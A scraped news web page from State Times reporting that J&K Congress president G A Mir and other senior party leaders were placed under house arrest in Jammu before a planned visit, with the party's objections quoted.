<div class="wp-block-image"><figure class="aligncenter"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg?x39047" alt="" class="wp-image-566335" srcset="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg 600w, http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest--300x145.jpg 300w" sizes="(max-width: 600px) 100vw, 600px" /></figure></div>



<p>STATE TIMES NEWS<br /> Jammu: Jammu and Kashmir Congress President G A Mir and several other senior leaders were placed under house arrest here on Tuesday ahead of their planned visit to parts of Jammu region and south Kashmir, according to a party leader.<br /> Mir along with former Deputy Chief Minister Tara Chand and senior vice president and former minister Raman Bhalla were placed under house arrest here this morning, Jammu and Kashmir Pradesh Congress Committee (JKPCC) chief spokesperson Ravinder Sharma said.<br /> He said several other former legislators, ministers and youth leaders were also directed not to move out of their houses by police.<br /> Police officials were not immediately available for a confirmation.<br /> Mir said, &#8220;We decided to visit parts of Jammu region and South Kashmir and sent a formal request to the government. We were granted permission. But this morning, when we were supposed to leave for the visit, police was there at my house and the houses of other leaders. They told us that we are under house arrest&#8221;.<br />
A party delegation under his leadership was supposed to visit different areas including Udhampur, Ramban and south Kashmir to interact with party workers, he said.<br />
&#8220;Police and government should have sent a formal letter to us for denial of permission, when we had written to them,&#8221; he said.<br />
Condemning the administration for the action, Sharma said &#8220;on the one hand, the government is making claims of normalcy in Jammu and Kashmir and on the other they are not allowing the opposition to undertake political activity. Their claim of normalcy is hollow.&#8221;<br />
&#8220;One fails to understand why BJP leaders are allowed to move freely, while curbs are being put on the opposition to keep them away from the public,&#8221; he said.</p>
      

    
		<script type="text/javascript">
		jQuery(document).ready(function($) {
			$('.e3lanat-rotator-id-715 .mom-e3lanat-inner').imagesLoaded( function() {
			jQuery('.e3lanat-rotator-id-715 .mom-e3lanat-inner').boxSlider({
				autoScroll: false,
				timeout: 5000,
				speed: 800,
				effect: 'scrollVert3d',
				pauseOnHover: true,
				next:'.e3lanat-rotator-id-715 .adr-next',
				prev: '.e3lanat-rotator-id-715 .adr-prev'
				
			});

			});

		});
	</script>
		<div class="mom-e3lanat-wrap  ">
	<div class="mom-e3lanat e3lanat-layout-rotator e3lanat-rotator-id-715" style="width:320px; height:100px;">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="8540" style=" ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- mobile one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:320px;height:100px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="6339736216"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
       <div class="mom-social-share ss-horizontal border-box php-share" data-id="566259">
                    <div class="ss-icon facebook">
                <a href="#" onclick="window.open('http://www.facebook.com/sharer/sharer.php?u=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/', 'Share This', 'menubar=no,toolbar=no,resizable=no,scrollbars=no, width=600,height=455');"><span class="icon"><i class="fa-icon-facebook"></i>Share</span></a>
                <span class="count">0</span>
            </div> <!--icon-->
        
                    <div class="ss-icon twitter">
                <a href="http://twitter.com/share?text=JKPCC chief among senior Cong leaders put under house arrest&url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/" onclick="window.open(this.href, 'Post this on twitter', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,width=600,height=455');"><span class="icon"><i class="fa-icon-twitter"></i>Tweet</span></a>
            </div> <!--icon-->
        
                    <div class="ss-icon googleplus">
                <a href="#"
onclick="window.open('https://plus.google.com/share?url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false"><span class="icon"><i class="fa-icon-google-plus"></i>Share</span></a>
            </div> <!--icon-->
                                    <div class="ss-icon linkedin">
                <a href="#"
onclick="javascript:window.open('http://www.linkedin.com/shareArticle?mini=true&url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/&title=JKPCC chief among senior Cong leaders put under house arrest&source=http%3A%2F%2Fnews.statetimes.in', '', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-linkedin"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="ss-icon pinterest">
                <a href="http://pinterest.com/pin/create/bookmarklet/?media=http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg&amp;
url=http://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/&amp;
is_video=false&amp;description=JKPCC chief among senior Cong leaders put under house arrest"
onclick="javascript:window.open(this.href, '_blank', 'menubar=no,toolbar=no,resizable=no,scrollbars=no,height=455,width=600');return false;"><span class="icon"><i class="fa-icon-pinterest"></i>Share</span></a>
                <span class="count"></span>
            </div> <!--icon-->
                            <div class="clear"></div>
        </div> <!--social share-->

</div> <!-- entry content -->
</div> <!-- base box -->

            <div class="np-posts">
                <ul>
			                    <li class="np-post prev border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="JKPCC chief among senior Cong leaders put under house arrest"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/" class="link prev"><i class="fa-icon-double-angle-left"></i>Previous</a>
                            <h3><a href="http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/">BJP the gainer-BJP the loser</a></h3>
                        </div>
                    </li>
		    		                        <li class="np-post next border-box">
						<div class="post-img">
                            <a href="http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="JKPCC chief among senior Cong leaders put under house arrest"></a>
                        </div>
			                        <div class="details has-feature-image">
                            <a href="http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/" class="link next"><i class="fa-icon-double-angle-right alignright"></i>Next</a>
                            <h3><a href="http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/">Well prepared to face challenge from Pak, China: Gen Rawat</a></h3>
                        </div>
                    </li>
		                    </ul>
            </div> <!-- np posts -->
		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="322174" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:block"
     data-ad-format="autorelaxed"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="4609961952"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
                <h2 class="single-title">Related Articles</h2>
            <div class="base-box single-box">
                <ul class="single-related-posts">
	   	     	       <li>
			                        <a href="http://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg" alt="Stone-arrangement by a child to welcome new year"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/">Stone-arrangement by a child to welcome new year</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-01-01T01:05:56+00:00">January 01, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg" alt="Lakhanpur toll post  abolished from New Year"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/">Lakhanpur toll post  abolished from New Year</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-01-01T00:59:22+00:00">January 01, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/2-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/2.jpg" alt="India reserves right to ‘preemptively strike’ at sources of terror"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/">India reserves right to ‘preemptively strike’ at sources of terror</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-01-01T00:58:46+00:00">January 01, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg" alt="Well prepared to face challenge from Pak, China: Gen Rawat"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/">Well prepared to face challenge from Pak, China: Gen Rawat</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-01-01T00:58:34+00:00">January 01, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/"><img src="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-190x122.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO.jpg" alt="BJP the gainer-BJP the loser"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/bjp-the-gainer-bjp-the-loser/">BJP the gainer-BJP the loser</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-01-01T00:57:49+00:00">January 01, 2020</time>
			</div>
                </li>

	       <li>
			                        <a href="http://news.statetimes.in/dgps-commendation-medal-announced/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/STREEP-1024x201.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/STREEP-1024x201.jpg" alt="DGP’s Commendation Medal announced"></a>
			                        <h4><a itemprop="name" href="http://news.statetimes.in/dgps-commendation-medal-announced/">DGP’s Commendation Medal announced</a></h4>
                        <div class="mom-post-meta">
			<time datetime="2020-01-01T00:57:46+00:00">January 01, 2020</time>
			</div>
                </li>

</ul>
</div>

<div id="comments" class="comments-area">

	
		
		<div id="respond" class="comment-respond">
		<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/#respond" style="display:none;">Cancel Reply</a></small></h3>			<form action="http://news.statetimes.in/wp-comments-post.php" method="post" id="commentform" class="comment-form">
				<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> Required fields are marked <span class="required">*</span></p><p class="comment-form-comment"><textarea id="comment" placeholder="Comment..." name="comment" cols="45" rows="8" aria-required="true"></textarea></p><input id="author" name="author" type="text" placeholder="Name (required)" value="" size="30" aria-required='true' />
<input id="email" name="email" type="text" placeholder="Email (required)" value="" size="30" aria-required='true' />
<input id="url" name="url" type="text" placeholder="Website" value="" size="30" />
<p class="form-submit"><input name="submit" type="submit" id="submit-comment" class="submit" value="Post Comment" /> <input type='hidden' name='comment_post_ID' value='566259' id='comment_post_ID' />
<input type='hidden' name='comment_parent' id='comment_parent' value='0' />
</p><p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="b19a393c5c" /></p><p style="display: none;"><input type="hidden" id="ak_js" name="ak_js" value="33"/></p>			</form>
			</div><!-- #respond -->
	
</div><!-- #comments .comments-area -->
            </div> <!--main column-->
                      <div class="sidebar secondary-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-posts_list"><div class="widget-head"><h3 class="widget-title"><span>Latest News</span></h3></div>		<ul>
		
			<li><a href="http://news.statetimes.in/abhay-sopori-awarded-top-grade-by-air-2/">Abhay Sopori awarded ‘Top Grade’ by AIR</a></li>

			
			<li><a href="http://news.statetimes.in/snowfall-likely-in-kashmir-valley-on-new-year-day/">Snowfall likely in Kashmir Valley on New Year day</a></li>

			
			<li><a href="http://news.statetimes.in/govt-creates-new-department-of-military-affairs-to-be-headed-by-cds/">Govt creates new Department of Military Affairs, to be headed by CDS</a></li>

			
			<li><a href="http://news.statetimes.in/uttar-pradesh-landmark-ayodhya-verdict-violent-protests-cap-eventful-year/">Uttar Pradesh: Landmark Ayodhya verdict, violent protests cap eventful year</a></li>

			
			<li><a href="http://news.statetimes.in/bank-fraud-ed-attaches-over-rs-124-cr-assets-of-media-group/">Bank fraud: ED attaches over Rs 124-cr assets of media group</a></li>

			
			<li><a href="http://news.statetimes.in/huawei-thanks-indian-govt-for-5g-trials-permission-says-committed-to-india/">Huawei thanks Indian Govt for 5G trials permission, says committed to India</a></li>

			
			<li><a href="http://news.statetimes.in/gen-mukund-naravane-takes-charge-as-new-army-chief/">Gen Mukund Naravane takes charge as new Army chief</a></li>

			
			<li><a href="http://news.statetimes.in/didnt-want-to-do-surface-level-scream-fest-with-ghost-stories-zoya-akhtar/">Didn&#8217;t want to do surface-level scream fest with &#8216;Ghost Stories&#8217;: Zoya Akhtar</a></li>

			
			<li><a href="http://news.statetimes.in/govt-has-started-on-wrong-foot-on-cds-appointment-cong/">Govt has started on wrong foot on CDS appointment: Cong</a></li>

			
			<li><a href="http://news.statetimes.in/opposition-should-show-magnanimity-allow-mva-govt-to-function-sena/">Opposition should show magnanimity, allow MVA govt to function: Sena</a></li>

			
			<li><a href="http://news.statetimes.in/hope-army-will-rise-to-greater-heights-under-the-new-army-chief-gen-bipin-rawat/">Hope Army will rise to greater heights under the new Army Chief: Gen Bipin Rawat</a></li>

			
			<li><a href="http://news.statetimes.in/congress-maha-ministers-meet-rahul-gandhi/">Congress Maha ministers meet Rahul Gandhi</a></li>

			
			<li><a href="http://news.statetimes.in/history-behind-das-led-rbi-charts-new-trails-sans-acrimony/">History behind, Das-led RBI charts new trails sans acrimony</a></li>

			
			<li><a href="http://news.statetimes.in/pm-condoles-demise-of-nagaland-assembly-speaker/">PM condoles demise of Nagaland Assembly Speaker</a></li>

			
			<li><a href="http://news.statetimes.in/4-medium-intensity-earthquakes-hit-j-k/">4 medium intensity earthquakes hit J-K</a></li>

											</ul>
</div>
            </div> <!--main sidebar-->
            <div class="clear"></div>
            <div class="clear"></div>
</div> <!--main container-->            
            <div class="sidebar main-sidebar" role="complementary" itemscope="itemscope" itemtype="http://schema.org/WPSideBar">
            <div class="widget momizat-ads">		<div class="mom-e3lanat-wrap responsive ">
	<div class="mom-e3lanat " style="">
		<div class="mom-e3lanat-inner">
		
				<div class="mom-e3lan" data-id="4677" style="width:px; height:autopx;  ">
		<div class="e3lan-code"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- sidebar one -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:250px"
     data-ad-client="ca-pub-3121650879019050"
     data-ad-slot="5446915816"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>	</div><!--mom ad-->
			</div>
	</div>	<!--Mom ads-->
	</div>
</div><div class="widget widget_momizattabber">                        <div class="main_tabs">
                            <ul class="tabs"></ul>
                            <div class="tabs-content-wrap">
                                <div class="tab-content"><a href="#" class="mom-tw-title">Top Stories</a>                                   <div class="mom-posts-widget">

					<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg" alt="Stone-arrangement by a child to welcome new year" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/WELCOME-2020-PIC-2-1024x683.jpg" alt="Stone-arrangement by a child to welcome new year" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/stone-arrangement-by-a-child-to-welcome-new-year/">Stone-arrangement by a child to welcome new year</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T01:05:56+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg" alt="Lakhanpur toll post  abolished from New Year" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/IMG_20191231_163940.jpg" alt="Lakhanpur toll post  abolished from New Year" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/lakhanpur-toll-post-abolished-from-new-year/">Lakhanpur toll post  abolished from New Year</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:59:22+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/"><img src="https://news.statetimes.in/wp-content/uploads/2020/01/2-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2020/01/2-90x60.jpg" alt="India reserves right to ‘preemptively strike’ at sources of terror" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/"><img src="https://news.statetimes.in/wp-content/uploads/2020/01/2-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2020/01/2-180x120.jpg" alt="India reserves right to ‘preemptively strike’ at sources of terror" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/india-reserves-right-to-preemptively-strike-at-sources-of-terror/">India reserves right to ‘preemptively strike’ at sources of terror</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:58:46+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Well prepared to face challenge from Pak, China: Gen Rawat" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Well prepared to face challenge from Pak, China: Gen Rawat" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/well-prepared-to-face-challenge-from-pak-china-gen-rawat/">Well prepared to face challenge from Pak, China: Gen Rawat</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:58:34+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg" alt="JKPCC chief among senior Cong leaders put under house arrest" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/raman-bhalla-house-arrest-.jpg" alt="JKPCC chief among senior Cong leaders put under house arrest" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/jkpcc-chief-among-senior-cong-leaders-put-under-house-arrest/">JKPCC chief among senior Cong leaders put under house arrest</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:58:19+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/bjp-the-gainer-bjp-the-loser/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="BJP the gainer-BJP the loser" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/bjp-the-gainer-bjp-the-loser/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="BJP the gainer-BJP the loser" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/bjp-the-gainer-bjp-the-loser/">BJP the gainer-BJP the loser</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:57:49+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/dgps-commendation-medal-announced/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/STREEP-1024x201.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/STREEP-1024x201.jpg" alt="DGP’s Commendation Medal announced" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/dgps-commendation-medal-announced/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/STREEP-1024x201.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/STREEP-1024x201.jpg" alt="DGP’s Commendation Medal announced" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/dgps-commendation-medal-announced/">DGP’s Commendation Medal announced</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:57:46+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/lt-guv-reviews-progress-of-national-highway-nhidcl-projects/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Lt Guv reviews progress of National Highway, NHIDCL projects" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/lt-guv-reviews-progress-of-national-highway-nhidcl-projects/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Lt Guv reviews progress of National Highway, NHIDCL projects" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/lt-guv-reviews-progress-of-national-highway-nhidcl-projects/">Lt Guv reviews progress of National Highway, NHIDCL projects</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:57:40+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/jk-police-set-example-with-its-handling-of-situation-post-art-370-abrogation-dgp/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/D.G.P-Dilbagh-Singh-addressing-press-conference-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/D.G.P-Dilbagh-Singh-addressing-press-conference-1.jpg" alt="J&K Police set example with its handling of situation post Art 370 abrogation: DGP" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/jk-police-set-example-with-its-handling-of-situation-post-art-370-abrogation-dgp/"><img src="http://news.statetimes.in/wp-content/uploads/2020/01/D.G.P-Dilbagh-Singh-addressing-press-conference-1.jpg?x39047" data-hidpi="http://news.statetimes.in/wp-content/uploads/2020/01/D.G.P-Dilbagh-Singh-addressing-press-conference-1.jpg" alt="J&K Police set example with its handling of situation post Art 370 abrogation: DGP" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/jk-police-set-example-with-its-handling-of-situation-post-art-370-abrogation-dgp/">J&#038;K Police set example with its handling of situation post Art 370 abrogation: DGP</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:56:51+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/db-refers-matter-to-cbi-for-indepth-probe/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="DB refers matter to CBI for indepth probe" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/db-refers-matter-to-cbi-for-indepth-probe/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="DB refers matter to CBI for indepth probe" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/db-refers-matter-to-cbi-for-indepth-probe/">DB refers matter to CBI for indepth probe</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:56:43+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/railways-announces-fare-hike-effective-from-jan-1/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="Railways announces fare hike effective from Jan 1" width="90" height="60"></a></div>
			    <div class="post-img sec-sidebar-element"><a href="https://news.statetimes.in/railways-announces-fare-hike-effective-from-jan-1/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-180x120.jpg" alt="Railways announces fare hike effective from Jan 1" width="180" height="120"></a><span class="post-format-icon"></span></div>
			    			   <div class="details has-feature-image">
			    <h4><a href="https://news.statetimes.in/railways-announces-fare-hike-effective-from-jan-1/">Railways announces fare hike effective from Jan 1</a></h4>
			   <div class="mom-post-meta mom-w-meta">
				<span datetime="2020-01-01T00:56:23+00:00" class="entry-date">January 01, 2020</span>
			    			    </div>
			</div>
			</div> <!--//post-->

						<div class="mpw-post">
							    <div class="post-img main-sidebar-element"><a href="https://news.statetimes.in/hc-quashes-psa-against-five-stone-pelters-in-kashmir/"><img src="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg?x39047" data-hidpi="https://news.statetimes.in/wp-content/uploads/2016/12/ST-LOGO-90x60.jpg" alt="HC quashes PSA against five stone pelters in Kashmir" width="90" height="60"></a></div>
